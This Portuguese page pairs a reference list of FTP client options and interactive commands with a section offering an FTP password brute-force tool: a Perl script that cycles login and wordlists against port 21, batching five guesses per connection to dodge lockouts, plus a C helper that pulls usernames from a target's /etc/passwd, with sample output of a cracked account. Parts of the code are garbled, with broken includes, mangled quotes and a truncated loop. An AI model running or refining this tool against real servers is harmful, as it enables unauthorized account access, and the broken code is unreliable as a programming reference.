Comandos FTP

COMANDOS FTP

Transfere arquivos de ou para um computador remoto.

ftp [-v] [-d] [-i] [-n] [-g] [-s:nomearq] [-a] [-w:tamanho] [computador]

O servidor ftp solicitará um usuário e a senha correspondente. A maioria dos servidores FTP pode ser acessada por usuários não cadastrados, utilizando o usuário Anonymous. Esse usuário não requer senha, mas muitos servidores solicitam como senha um endereço de e-mail.

Opção Descrição

-V - Elimina as mensagens de resposta do servidor.
<------------------------------------>
-D - Ativa o modo de depuração, exibindo os comandos FTP enviados e recebidos.
<------------------------------------>
-I - Desativa a confirmação para a transferência de cada arquivo em operações com múltiplos arquivos.
<------------------------------------>
-N - Elimina o login automático na conexão inicial.
<------------------------------------>
-G - Desativa o globbing, que permite o uso de caracteres de máscara (*, ?) em nomes de arquivos.
<------------------------------------>
-S - Especifica um arquivo de texto contendo os comandos FTP a serem executados automaticamente.
<------------------------------------>
-A - Utiliza qualquer placa de rede para estabelecer a conexão com o servidor FTP.
<------------------------------------>
-W - Define o tamanho do buffer de transferência (o default é de 4 KBytes). Computador Nome do servidor FTP ou endereço IP. Deve ser o último parâmetro da linha de comando.
<------------------------------------>
A seguir está a sintaxe dos comandos interativos do protocolo FTP. Esses comandos são utilizados de acordo com cada sistema e geralmente já com a conexão online.

Comando Descrição

append - Acrescenta informações a um arquivo.
<------------------------------------>
ascii - Indica que a transferência de arquivos será feita no modo de texto (arquivos apenas de texto, como TXT ou HTML)
<------------------------------------>
bell - Emite aviso sonoro ao término do comando.
<------------------------------------>
binary - Indica que a transferência de arquivos será feita no modo binário.(utilizado para arquivos não-texto, como fotos, programas e vídeos)
<------------------------------------>
bye - Fecha a sessão FTP e sai do programa FTP.
<------------------------------------>
cd - Seleciona um novo diretório de trabalho no computador remoto.
<------------------------------------>
close - Fecha a sessão com um servidor FTP.
<------------------------------------>
debug - Ativa/desativa o modo de depuração.
<------------------------------------>
delete - Elimina arquivos no computador remoto.
<------------------------------------>
dir - Lista o conteúdo de um diretório remoto.
<------------------------------------>
disconnect - Fecha a sessão com um servidor FTP.
<------------------------------------>
get - Copia um arquivo de um computador remoto para o computador local
<------------------------------------>
glob - Ativa/desativa o uso de caracteres de máscara (*,?) em nomes de arquivos.
<------------------------------------>
hash - Ativa/desativa a impressão de “#” para cada buffer transferido.
<------------------------------------>
help - Exibe help on-line de um comando FTP. Se o comando não for especificado, exibe a lista dos comandos disponíveis.
<------------------------------------>
lcd - Seleciona um novo diretório de trabalho no computador local.
<------------------------------------>
literal - Envia uma linha de comando diretamente ao servidor FTP.
<------------------------------------>
ls - Lista o conteúdo de um diretório remoto.
<------------------------------------>
mdelete - Elimina múltiplos arquivos no computador remoto.
<------------------------------------>
mdir - Lista o conteúdo de múltiplos diretórios no servidor remoto
<------------------------------------>
mget - Copia múltiplos arquivos do computador remoto para o computador local.
<------------------------------------>
mkdir - Cria um diretório no computador remoto.
<------------------------------------>
mls - Lista o conteúdo de múltiplos diretórios no servidor remoto
<------------------------------------>
mput - Copia múltiplos arquivos do computador local para o computador remoto.
<------------------------------------>
open - Estebelece uma conexão com um servidor FTP.
<------------------------------------>
prompt - Ativa/desativa a confirmação para a transferência com muitos arquivos
<------------------------------------>
put - Copia um arquivo do computador local para um computador remoto (upload).
<------------------------------------>
pwd - Exibe o diretório corrente no computador remoto.
<------------------------------------>
quit - Fecha a sessão FTP e sai do programa FTP.
<------------------------------------>
quote - Envia uma linha de comando diretamente ao servidor FTP.
<------------------------------------>
recv - Copia um arquivo de um computador remoto para o computador local
<------------------------------------>
remotehelp - Exibe help on-line para comandos diretos do servidor FTP.
<------------------------------------>
rename - Renomeia um arquivo.
<------------------------------------>
rmdir - Remove um diretório no computador remoto.
<------------------------------------>
send - Copia um arquivo do computador local para um computador remoto (upload).
<------------------------------------>
status - Exibe informações sobre a configuração do cliente FTP.
<------------------------------------>
trace - Ativa/desativa o modo trace (exibição de todas as ações executadas).
<------------------------------------>
type - Define ou exibe o tipo de transferência de arquivo (ASCII ou binary).
<------------------------------------>
user - Especifica um novo usuário para o computador remoto.
<------------------------------------>

FTP BRUTE FORCE

Esse programa um update do FTP Brute Force attack 1.0 da Near(Z). Eu dei uma melhorada nele, para ficar mais rapido e mais tchananam… No da nearz ele abria uma conexao para cada teste de login/pass. Agora ele testa 5 l/p em cada conexao oque torna o programa mais rapido.
Mas porque entao soh 5? Pq a maioria dos daemons ftp sao configurados para desconectar o cliente apos o 5o erro de login.

No antigo voce entrava com uma wordlist e 1 unico login era testado. Agora voce indica tambem um loginlist para poder testar as words em varios logins.

Como usa??

[struck@henix]$ ./bruteftp.pl 127.0.0.1 logins dict
FTP Brute force
by Cheat Struck, struck.8m.com

root - [1] not found - root
root - [1] not found - struck
root - [1] not found - lamah
root - [1] not found - cheat
struck - [1] not found - root
struck - [1] not found - struck
struck - [1] not found - lamah

struck - [8] !!!ENTROU!!! - cheat

[struck@henix]$

Viu??? Facil e pratico… Soh tipo… nao poe na login_list ftp ou anonymous pq qquer merda vai entrar como senha. Nao seja burro! Pra ficar mais facil, faiz ela baseada no /etc/passwd do host. Soh pa poupar seu tempo vai junto o retire.c que tira o login do passwd pra vc.

[struck@henix]$ gcc retire.c -o retire
[struck@henix]$ ./retire /etc/passwd logins
Retirando logins…
Logins gravados em logins

[struck@henix]$

Ja a wordlist, de preferencia uma pequena com senhas comuns.

Ae estao os programas:

<++> bruteftp/retire.c
#include
#include
#include

main(int argc, char *argv[]) {

FILE *fp, *fp2;
char login[1000], com[50];
int i=0;

if (argc <>
printf(”Use %s \n”,argv[0]);
exit(0);
}
printf(”Retirando logins…\n”);

fp = fopen(argv[1],”r”);
fp2 = fopen(argv[2],”w”);

while( !feof(fp) ) {

bzero((char *)&login, sizeof(login));
bzero((char *)&com, sizeof(com));

if(fgets(login, 1000, fp) == NULL) break;
login[strlen(login)-1] = ‘ ‘;

for(i=0;i<1000;i++){>

<++> bruteftp/bruteftp.pl
#!/usr/bin/perl
use Socket;
print “\nFTP Brute force”;
print “\nby Cheat Struck, struck.8m.com\n”;
if ($ARGV[0] eq ” || $ARGV[1] eq ” || $ARGV[2] eq ”) {
print “\n\nUsage: bruteftp.pl Host Login_list Word_list”;
print “\nEx. hackftp 127.0.0.1 logins Dict\n\n”;
exit;
}

$i=0;
$temp=”;
$login=”;
$temp2=”;

$h = “$ARGV[0]“;
$p = 21;
$in_addr = (gethostbyname($h));
$addr = sockaddr_in($p,$in_addr);
$proto = getprotobyname(’tcp’);

open (FILE2,”$ARGV[1]“) || die “cade o lista logins?”;

do{
$x=1;$n=0;
&getlogin;
&connection;
&data1;
do{
&getword;
&data2;
&result;
}while($x==1);
close S;

}while(1==1);

sub getlogin
{
$login=”; $l=”; $var12=”;
open (FILE,”$ARGV[2]“) || die “cade o dicionario?”;
do{
$login=”$login$var12?;
read(FILE2, $var12, 1);
}while($var12 ne chr(10));
$l=$login;
$login=”$login$var12?;

}
sub getword
{
$temp2=”;
do{
read(FILE, $var12, 1);
$temp2=”$temp2$var12?;
}while($var12 ne chr(10));
$z++; $n++;
if($n == 5) {
close S;
&connection;
&data1;
}
if(eof(FILE)) { $x=0; };
}

sub connection
{
socket(S, AF_INET, SOCK_STREAM, $proto) || die $!;
connect(S,$addr) || die $!;
}

sub data1
{
do{
read(S, $var1, 1) || die $!;
$temp=”$temp$var1?; $i++;
}while(substr($temp,$i-3,3) ne ‘220');

}
sub data2
{
$temp=”;
$i=0;
send (S,”user $login\n”,0) || die “Erro enviando”;
do{
read(S, $var1, 1) || die $!;
$temp=”$temp$var1?; $i++;
}while(substr($temp,$i-3,3) ne ‘331' && substr($temp,$i-3,3) ne ‘530');
if(substr($temp,$i-3,3) eq ‘530'){
print “\nLogin nao permitido - $ARGV[1]\n\n”;
exit;
}
send (S,”pass $temp2?,0) || die “Erro enviando”;
$temp=”;
$i=0;
do{
read(S, $var1, 1) || die $!;
$temp=”$temp$var1?; $i++;
}while(substr($temp,$i-3,3) ne ‘530' && substr($temp,$i-3,3) ne ‘230');
}
sub result
{
if(substr($temp,$i-3,3) eq ‘230'){
print “\n$l - [$z] !!!ENTROU!!! - $temp2\n”;
exit;
}
if(substr($temp,$i-3,3) eq ‘530'){
print “$l - [$z] not found - $temp2?;
}
}